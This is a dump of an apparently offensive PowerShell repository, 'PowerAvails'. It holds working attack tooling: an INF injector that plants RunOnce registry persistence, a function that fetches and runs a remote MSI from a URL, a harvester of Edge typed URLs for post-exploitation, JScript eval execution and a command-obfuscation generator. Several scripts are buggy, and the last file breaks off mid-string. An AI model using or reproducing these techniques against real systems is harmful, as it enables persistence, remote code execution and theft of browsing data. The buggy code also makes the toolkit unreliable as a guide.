├── INF-Inject ├── INFDefaultinstall.exe ├── INFScript.inf ├── invoke-Backdoors.ps1 └── syssetup.dll ├── Invoke-Parent.ps1 ├── MSIRemoteExecution ├── install-Package ├── invoke-MSIRemoteExecution.ps1 └── msiexec.exe ├── PSBrowser ├── Get-TokenMSEdge.ps1 └── PNG │ └── Token.PNG ├── README.md └── invoke-Confusion.ps1 /INF-Inject/INFDefaultinstall.exe: -------------------------------------------------------------------------------- 1 | INFDefaultinstall.exe C:\test 2 | *\ Needs Administrator 3 | -------------------------------------------------------------------------------- /INF-Inject/INFScript.inf: -------------------------------------------------------------------------------- 1 | [STRINGS] 2 | KEY_RUNONCE = "Software\Microsoft\Windows\CurrentVersion\RunOnce" 3 | KEY_REMOVE = "Software\Microsoft\Windows\CurrentVersion\Uninstall" 4 | ADD_1 = "Powershell_Execute" 5 | ;; Locasised strings 6 | ;;; Author Mat harr0ey 7 | ;;; English INFScript Inject 8 | ADD_3 = "PowerShell Execution" 9 | ADD_4 = "PowerShell:>" 10 | [version] 11 | signature="$CHICAGO$" 12 | 13 | [DefaultInstall] 14 | AddReg = Titre.Reg 15 | 16 | [Titre.Reg] 17 | HKLM,%KEY_RUNONCE%\setup," "%ADD_1% 18 | HKLM,%KEY_RUNONCE%\setup,"___________________________" 19 | HKLM,%KEY_RUNONCE%\setup,%ADD_3% 20 | HKLM,%KEY_RUNONCE%\setup,"" 21 | HKLM,%KEY_RUNONCE%\setup,%ADD_4%,0,"notepad.exe" 22 | [Question] 23 | Prompt = %NEW_1% 24 | ButtonType = YESNO 25 | Title = %ADD_1% 26 | 27 | -------------------------------------------------------------------------------- /INF-Inject/invoke-Backdoors.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Author ( Matt harr0ey ) 3 | .Lisence BSD3 4 | .Required Dependencies: None 5 | .Optional Dependencies: None 6 | 7 | 8 | .Topic 9 | Launch Backdoors INFScript 10 | 11 | .Synopsis 12 | invoke-Backdoors INFScript Inject 13 | 14 | .Description 15 | You Can Use This Script Powershell For Execution INFScript Backdoors With Also Install Files .INF Script Using INFDefaultinstall.exe 16 | 17 | .Note 18 | This invoke-Backdoors Needs Administrator 19 | 20 | .Example 21 | PS:> invoke-Backdoors -Command 'HKLM,%KEY_RUNONCE%\setup,%ADD_4%,0,"calc.exe"' 22 | [STRINGS] 23 | KEY_RUNONCE = "Software\Microsoft\Windows\CurrentVersion\RunOnce" 24 | KEY_REMOVE = "Software\Microsoft\Windows\CurrentVersion\Uninstall" 25 | ADD_1 = "Powershell_Execute" 26 | ;; Locasised strings 27 | ;;; English 28 | ADD_3 = "PowerShell Execution" 29 | ADD_4 = "PowerShell:>" 30 | [version] 31 | signature="$CHICAGO$" 32 | 33 | [DefaultInstall] 34 | AddReg = Titre.Reg 35 | 36 | [Titre.Reg] 37 | HKLM,%KEY_RUNONCE%\setup," "%ADD_1% 38 | HKLM,%KEY_RUNONCE%\setup,"___________________________" 39 | HKLM,%KEY_RUNONCE%\setup,%ADD_3% 40 | HKLM,%KEY_RUNONCE%\setup,"" 41 | HKLM,%KEY_RUNONCE%\setup,%ADD_4%,0,"calc.exe" 42 | [Question] 43 | Prompt = %NEW_1% 44 | ButtonType = YESNO 45 | Title = %ADD_1% 46 | 47 | .References 48 | rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 C:\INFPS.inf 49 | 50 | 51 | .ReferencesBlog 52 | https://github.com/homjxi0e/APT 53 | 54 | 55 | #> 56 | 57 | function invoke-Backdoors { 58 | 59 | [CmdletBinding()] 60 | 61 | param ( 62 | 63 | [Parameter(Mandatory=$true)] 64 | [Parameter(Position = 0, ParameterSetName = 'Command')] 65 | [String]$Command 66 | ) 67 | 68 | if ($like = $Command) { 69 | 70 | $x01 = ' [STRINGS] ' 71 | $x02 = ' KEY_RUNONCE = "Software\Microsoft\Windows\CurrentVersion\RunOnce" ' 72 | $x03 = ' KEY_REMOVE = "Software\Microsoft\Windows\CurrentVersion\Uninstall" ' 73 | $x04 = ' ADD_1 = "Powershell_Execute" ' 74 | $x05 = ' ;; Locasised strings ' 75 | $x06 = ' ;;; English ' 76 | $x07 = ' ADD_3 = "PowerShell Execution" ' 77 | $x08 = ' ADD_4 = "PowerShell:>" ' 78 | $x09 = ' [version] ' 79 | $x10 = ' signature="$CHICAGO$" ' 80 | 81 | $x11 = ' [DefaultInstall] ' 82 | $x12 = ' AddReg = Titre.Reg ' 83 | 84 | $x13 = ' [Titre.Reg] ' 85 | $x14 = ' HKLM,%KEY_RUNONCE%\setup," "%ADD_1% ' 86 | $x15 = ' HKLM,%KEY_RUNONCE%\setup,"___________________________" ' 87 | $x16 = ' HKLM,%KEY_RUNONCE%\setup,%ADD_3% ' 88 | $x17 = ' HKLM,%KEY_RUNONCE%\setup,"" ' 89 | $x18 = " $command " 90 | $x19 = ' [Question] ' 91 | $x20 = ' Prompt = %NEW_1% ' 92 | $x21 = ' ButtonType = YESNO ' 93 | $x22 = ' Title = %ADD_1% ' 94 | 95 | $INFScript1 = Add-Content -Value $x01 -PassThru C:\INFInjection.INF 96 | $INFScript2 = Add-Content -Value $x02 -PassThru C:\INFInjection.INF 97 | $INFScript3 = Add-Content -Value $x03 -PassThru C:\INFInjection.INF 98 | $INFScript4 = Add-Content -Value $x03 -PassThru C:\INFInjection.INF 99 | 100 | 101 | $INFScript5 = Add-Content -Value $x04 -PassThru C:\INFInjection.INF 102 | $INFScript6 = Add-Content -Value $x05 -PassThru C:\INFInjection.INF 103 | $INFScript7 = Add-Content -Value $x06 -PassThru C:\INFInjection.INF 104 | 105 | $INFScript8 = Add-Content -Value $x07 -PassThru C:\INFInjection.INF 106 | $INFScript9 = Add-Content -Value $x08 -PassThru C:\INFInjection.INF 107 | $INFScript10 = Add-Content -Value $x09 -PassThru C:\INFInjection.INF 108 | 109 | $INFScript11 = Add-Content -Value $x10 -PassThru C:\INFInjection.INF 110 | $INFScript12 = Add-Content -Value $x11 -PassThru C:\INFInjection.INF 111 | 112 | $INFScript13 = Add-Content -Value $x12 -PassThru C:\INFInjection.INF 113 | 114 | $INFScript14 = Add-Content -Value $x13 -PassThru C:\INFInjection.INF 115 | $INFScript15 = Add-Content -Value $x14 -PassThru C:\INFInjection.INF 116 | $INFScript16 = Add-Content -Value $x15 -PassThru C:\INFInjection.INF 117 | $INFScript17 = Add-Content -Value $x16 -PassThru C:\INFInjection.INF 118 | $INFScript18 = Add-Content -Value $x17 -PassThru C:\INFInjection.INF 119 | $INFScript19 = Add-Content -Value $x18 -PassThru C:\INFInjection.INF 120 | $INFScript20 = Add-Content -Value $x19 -PassThru C:\INFInjection.INF 121 | $INFScript21 = Add-Content -Value $x20 -PassThru C:\INFInjection.INF 122 | $INFScript23 = Add-Content -Value $x21 -PassThru C:\INFInjection.INF 123 | $INFScript24 = Add-Content -Value $x22 -PassThru C:\INFInjection.INF 124 | } 125 | 126 | try{ 127 | INFDefaultinstall.exe C:\INFInjection.INF 128 | } catch { 129 | throw "This Needs Admin" 130 | } 131 | 132 | } 133 | # 134 | -------------------------------------------------------------------------------- /INF-Inject/syssetup.dll: -------------------------------------------------------------------------------- 1 | syssetup,SetupInfObjectInstallAction DefaultInstall 128 C:\INFPS.inf 2 | *\ Needs Administrator 3 | -------------------------------------------------------------------------------- /Invoke-Parent.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | 3 | 4 | .Author Matt harr0ey @harr0ey 5 | .Optional Dependencies : None 6 | .Required Dependencies : None 7 | 8 | 9 | 10 | 11 | .Description 12 | This is powershell parent is a system operating to take info of parent in process ShellExecute alongside to display the clarification both who is opening this process with comprehension of the operation using WMIObject 13 | 14 | 15 | Encoded Code Powershell Load Reflection Assembly 16 | WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQ 17 | AGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAnAE0AaQBjAHIAbwBzAG8AZgB0AC4ASgBTAEMAcgBpAHAAdAAnACkA 18 | [void] [Microsoft.JScript.Eval]::JScriptEvaluate($Void,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) 19 | 20 | PS C:\> invoke-Parent -ProcessName powershell.exe 21 | 22 | 23 | UserName Domain_LOP SID 24 | -------- ---------- --- 25 | Matt DESKTOP-F5LB1H0 S-1-5-21-3470420603-3041439269-2463402797-1001 26 | 27 | 28 | PS C:\> invoke-Parent -ProcessName calc.exe 29 | 30 | 31 | UserName Domain_LOP SID 32 | -------- ---------- --- 33 | Matt DESKTOP-F5LB1H0 S-1-5-21-3470420603-3041439269-2463402797-1001 34 | 35 | 36 | PS C:\> 37 | 38 | #> 39 | 40 | function invoke-Paraent { 41 | 42 | [CmdletBinding()] 43 | 44 | param( 45 | 46 | [Parameter(Mandatory=$true)] 47 | [Parameter(Position = 0, ParameterSetName = 'ProcessName')] 48 | [string]$ProcessName 49 | 50 | ) 51 | 52 | if($ProcessName) { 53 | # Example about an Operation 54 | [void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.JSCript') 55 | $Void = 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("svchost.exe")' 56 | [void] [Microsoft.JScript.Eval]::JScriptEvaluate($Void,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) 57 | [void] [Microsoft.JScript.Eval]::JScriptEvaluate($Void,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) 58 | [void] [Microsoft.JScript.Eval]::JScriptEvaluate($Void,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) 59 | 60 | [void] [void] [void] [void] [void] [void] [void] [void] [void] [void] 61 | 62 | [void] [void] [void] [void] 63 | 64 | [void] [void] 65 | 66 | $0009 = $ProcessName 67 | 68 | Write-Host -BackgroundColor DarkCyan ("$(start $ProcessName)") 69 | 70 | $obj = Get-WmiObject -Class Win32_Process -Filter "Name = '$ProcessName'"| Sort-Object -Property CreationDate -Descending | Select-Object -Last 1 71 | 72 | 73 | $topic2 = ($obj.GetOwner().Domain) 74 | $topic1 = ($obj.GetOwner().User) 75 | $topic3 = ($obj.GetOwnerSid().Sid) 76 | %{[PSCustomObject]@{UserName=$topic1 ;Domain_LOP=$topic2 ;SID=$topic3}} 77 | #PSCustomOBject to statement creation 78 | 79 | 80 | } 81 | } 82 | -------------------------------------------------------------------------------- /MSIRemoteExecution/install-Package: -------------------------------------------------------------------------------- 1 | install-Package C:\test.msi 2 | -------------------------------------------------------------------------------- /MSIRemoteExecution/invoke-MSIRemoteExecution.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Author ( Matt harr0ey ) 3 | 4 | .Licence BSD3 5 | .Required Dependencies: None 6 | .Optional Dependencies: None 7 | 8 | .Description 9 | Windows Package installer MSI Remote Execution Via Powershell With msiexec.exe 10 | 11 | .Example 12 | PS:> invoke-MSIExecution -Local C:\Test.msi 13 | 14 | .Example 15 | PS:> invoke-MSIExecutionRemote -URL 16 | #> 17 | function invoke-MSIExecutionRemote { 18 | 19 | [CmdletBinding()] 20 | 21 | param ( 22 | 23 | [Parameter(Mandatory=$true)] 24 | 25 | [Parameter(Position = 0, ParameterSetName = 'URL')] 26 | 27 | [String]$URL,$Local 28 | ) 29 | 30 | if ($like = $URL) { 31 | 32 | $DragURL = "$URL" 33 | $RemoreMSI = msiexec.exe /i $URL 34 | } 35 | 36 | } 37 | 38 | function invoke-MSIExecutionLocal { 39 | 40 | 41 | [CmdletBinding()] 42 | 43 | param ( 44 | 45 | [Parameter(Mandatory=$true)] 46 | 47 | [Parameter(Position = 0, ParameterSetName = 'URL')] 48 | 49 | [String]$Local 50 | ) 51 | 52 | if ($like = $Local) { 53 | $LocalExecution = Install-Package $Local 54 | } 55 | 56 | } 57 | -------------------------------------------------------------------------------- /MSIRemoteExecution/msiexec.exe: -------------------------------------------------------------------------------- 1 | &- msiexec.exe /passive /i C:\testing.msi /norestart 2 | &- msiexec.exe /i C:\testing.msi /norestart 3 | -------------------------------------------------------------------------------- /PSBrowser/Get-TokenMSEdge.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Author Matt Homjxi0e @matthomjxiex02x 3 | .License PS Not More 4 | .Optional Dependencies: None 5 | .Required Dependencies: None 6 | 7 | 8 | .Synopsis 9 | Sniffer Every URLS the Users Browser Microsoft Edge From location Storage in Registry drag URLS For Attacker 10 | Note: This Operation Valid For Post Exploitation Empire =!-! 11 | .Example 12 | PS:> Get-TokenMsftEdge -CommandEx NULL -CommandEx NULL 13 | .Result 14 | url1 :any login 15 | url2 : any login 16 | url3 : any login 17 | url4 : any login 18 | url5 : any login 19 | url6 : any login 20 | url9 : any login 21 | url10 : 22 | url11 : 23 | url12 : 24 | url13 : 25 | url14 : 26 | url15 : 27 | url16 : 28 | PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\C 29 | lasses\Local Settings\Software\Microsoft\Windows\CurrentVersion\ 30 | AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Micro 31 | softEdge\TypedURLs 32 | PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\C 33 | lasses\Local Settings\Software\Microsoft\Windows\CurrentVersion\ 34 | AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Micro 35 | softEdge 36 | PSChildName : TypedURLs 37 | PSDrive : HKCU 38 | PSProvider : Microsoft.PowerShell.Core\Registry 39 | end Everything 40 | #> 41 | 42 | function Get-TokenMsftEdge { 43 | 44 | [CmdletBinding(SupportsPaging = $true)] 45 | param( 46 | [Parameter(Mandatory=$True,Position=0)] 47 | 48 | [parameter(Mandatory=$true,ParameterSetName="NULL")] 49 | 50 | [System.String]$CommandEx,$pa 51 | ) 52 | 53 | if ($null = $CommandEx) { 54 | 55 | $SnifferEdgedrag = Join-Path -Path "HKCU:\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\" -ChildPath TypedURLs 56 | 57 | Get-ItemProperty -Path $SnifferEdgedrag 58 | ( Out-String ) 59 | 60 | } 61 | 62 | } 63 | -------------------------------------------------------------------------------- /PSBrowser/PNG/Token.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/homjxi0e/PowerAvails/ebdd4102a46d3ee288139fe416beb1977eb1e3a8/PSBrowser/PNG/Token.PNG -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PowerAvails Powershell 2 | 3 | ![132131312](https://user-images.githubusercontent.com/25440152/50379654-e37c3400-0657-11e9-8364-b0f9f88fe589.PNG) 4 | 5 | 6 | * invoke-ConfusionJS -Command 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")' 7 | * invoke-Confusions-LLMTCOMCLSID -CLSID 8 | * invoke-SCTExecution -SCT 9 | * invoke-DLLLaunchApplication -CML !sought 10 | * invoke-lateralmovement -Command !sought 11 | * invoke-VBNET -CMLShell !sought 12 | * invoke-XMLTransform -XSL URL -XML URL 13 | * invoke-OpenWith -CML notepad.exe 14 | * invoke-invoke-DxCap -CML notepad.exe 15 | * invoke-ApplicationShellExecute -CML !sought 16 | * invoke-ADinfo -Type List 17 | * Get-TokenMsftEdge -Type List 18 | * invoke-URLPSShell -URI http.raw 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /invoke-Confusion.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | 3 | 4 | ####################################################################################### 5 | ####################################################################################### 6 | ## _ _ _____ __ _ ## 7 | ## (_) | | / __ \ / _| (_) ## 8 | ## _ _ ____ _____ | | _____ ______| / \/ ___ _ __ | |_ _ _ ___ _ ___ _ __ ## 9 | ## | | '_ \ \ / / _ \| |/ / _ \______| | / _ \| '_ \| _| | | / __| |/ _ \| '_ \ ## 10 | ## | | | | \ V / (_) | < __/ | \__/\ (_) | | | | | | |_| \__ \ | (_) | | | | ## 11 | ## |_|_| |_|\_/ \___/|_|\_\___| \____/\___/|_| |_|_| \__,_|___/_|\___/|_| |_| ## 12 | ####################################################################################### 13 | ####################################################################################### 14 | ########### ########### 15 | ########### ########### 16 | ########### ########### 17 | ########### ########### 18 | ########### ########### 19 | ########### ########### 20 | ########### ########### 21 | ########### ########### 22 | ########### ########### 23 | ########### ########### 24 | ########### ########### 25 | ########### ########### 26 | ########### ########### 27 | ########### ########### 28 | ########### ########### 29 | ########### ########### 30 | ########### ########### 31 | ########### 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | .Author ( @harr0ey ) 44 | .License not yet 45 | .Required Dependencies: None 46 | .Optional Dependencies: None 47 | 48 | 49 | .Description 50 | Adaptive confusion Powershell about attacking places secure from some products Microsoft with of some of the executive methods of the system 51 | 52 | .Broadly 53 | This make your edge progressively advanced About Attacks Powershell 54 | 55 | 56 | .Example 57 | PS:> invoke-ConfusionJS -Command 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")' 58 | 59 | 60 | .Example 61 | PS:> invoke-Confusions-LLMTCOMCLSID -CLSID 62 | 63 | 64 | .Example 65 | PS:> Invoke-COMScriptlet -SCT URL.SCT 66 | 67 | 68 | .Example 69 | PS:> invoke-DLLLaunchApplication -CML calc.exe 70 | 71 | 72 | .Example 73 | PS:> invoke-lateralmovement -Command calc.exe 74 | 75 | .Example 76 | PS:> invoke-VBNET -CMLShell calc.exe 77 | 78 | 79 | .Example 80 | PS:> invoke-XMLTransform -XSL URL -XML URL 81 | 82 | 83 | .Example 84 | PS:> invoke-DxCap -CML calc.exe 85 | 86 | 87 | .Example 88 | PS:> invoke-OpenWith -CML notepad.exe 89 | 90 | 91 | .Example 92 | PS:> invoke-ApplicationShellExecute -CML calc.exe 93 | 94 | 95 | .Example 96 | PS:> invoke-URLPSShell -URI URL! 97 | 98 | .Example 99 | PS:> 100 | 101 | 102 | 103 | #> 104 | 105 | $obj = ''' 106 | 107 | Author Mat harr0ey @harr0ey 108 | Thank you for visiting us 109 | ! Exit! 110 | ''' 111 | [void] [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.VisualBasic") 112 | 113 | [Microsoft.VisualBasic.Interaction]::MsgBox("$obj.", "OKOnly,SystemModal,Information", "Attention Powershell") 114 | 115 | Write-Host -ForegroundColor Green " 116 | _ _ _____ __ _ 117 | (_) | | / __ \ / _| (_) 118 | _ _ ____ _____ | | _____ ______| / \/ ___ _ __ | |_ _ _ ___ _ ___ _ __ 119 | | | '_ \ \ / / _ \| |/ / _ \______| | / _ \| '_ \| _| | | / __| |/ _ \| '_ \ 120 | | | | | \ V / (_) | < __/ | \__/\ (_) | | | | | | |_| \__ \ | (_) | | | | 121 | |_|_| |_|\_/ \___/|_|\_\___| \____/\___/|_| |_|_| \__,_|___/_|\___/|_| |_| 122 | --------------------------------------------------------------------------------- 123 | |===============| 124 | |= PowerAvails =| 125 | |= =| 126 | |=======================> https://github.com/homjxi0e/PowerAvails 127 | 128 | 129 | 1 invoke-ConfusionJS -Command 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")' 130 | 2 invoke-Confusions-LLMTCOMCLSID -CLSID 131 | 3 Invoke-COMScriptlet -SCT 132 | 4 invoke-DLLLaunchApplication -CML calc.exe 133 | 5 invoke-lateralmovement -Command calc.exe 134 | 6 invoke-VBNET -CMLShell calc.exe 135 | 7 invoke-XMLTransform -XSL URL -XML URL 136 | 8 invoke-OpenWith -CML notepad.exe 137 | 9 invoke-DxCap -CML notepad.exe 138 | 10 invoke-ApplicationShellExecute -CML calc.exe 139 | 11 invoke-ADinfo -Type List 140 | 12 Get-TokenMsftEdge -Type List 141 | 13 invoke-URLPSShell -URI URL! 142 | " 143 | $obj_ = Read-Host -Prompt Enter 144 | 145 | 146 | function invoke-DxCap { 147 | 148 | <# 149 | 150 | 151 | .Author ( @harr0ey ) 152 | .License BSD3 153 | .Required Dependencies: None 154 | .Optional Dependencies: None 155 | 156 | 157 | 158 | .Broadly 159 | Tool Command line Execution Via DXcap.exe Use DXCap.exe To Run CML 160 | 161 | 162 | 163 | .Example 164 | PS:> invoke-invoke-DxCap -CML notepad.exe 165 | 166 | #> 167 | 168 | [CmdletBinding()] 169 | 170 | param ( 171 | 172 | [Parameter(Mandatory=$true)] 173 | [Parameter(Position = 0, ParameterSetName = 'CML')] 174 | [String]$CML 175 | 176 | ) 177 | 178 | 179 | if ($like = $CML) { 180 | 181 | $ADDValueOpenWith = $CML 182 | DXcap.exe -c $CML 183 | 184 | 185 | } 186 | } 187 | 188 | 189 | function invoke-GenerateObf { 190 | 191 | <# 192 | 193 | .Author Matt harr0ey @harr0ey 194 | .License BSD3 195 | .Required Dependencies : None 196 | .Optional Dependencies : None 197 | 198 | .Broadly Generate Strings of Obfuscation Code inside CMD Prompt 199 | 200 | 201 | .Exmaple 202 | PS:> invoke-GenerateObf -Type strings 203 | 204 | #> 205 | 206 | 207 | [CmdletBinding()] 208 | 209 | param ( 210 | 211 | [Parameter(Mandatory=$true)] 212 | [Parameter(Position = 0, ParameterSetName = 'Type')] 213 | [Parameter(Position = 0, ParameterSetName = 'Strings')] 214 | [String] 215 | $Type 216 | 217 | 218 | ) 219 | 220 | If($Type) { 221 | 222 | try{ 223 | $Obj = Write-Host " 224 | p^c^a^l^u^a^ ^-^n^ ^-^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a c^a^l^c^ ^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a 225 | " -BackgroundColor Gray 226 | 227 | 228 | }Catch { 229 | 230 | throw "Write-Host 'Mistake because input Your Strings ' " 231 | 232 | } 233 | 234 | 235 | 236 | } 237 | 238 | 239 | 240 | 241 | } 242 | 243 | 244 | 245 | function invoke-help { 246 | 247 | 248 | [CmdletBinding()] 249 | 250 | param( 251 | 252 | [Parameter(Mandatory=$true)] 253 | 254 | [Parameter(Position = 0, ParameterSetName = 'Pattern')] 255 | [String] 256 | $Pattern 257 | 258 | 259 | ) 260 | 261 | if ($like = $Pattern) { 262 | Write-Host " 263 | 264 | 1 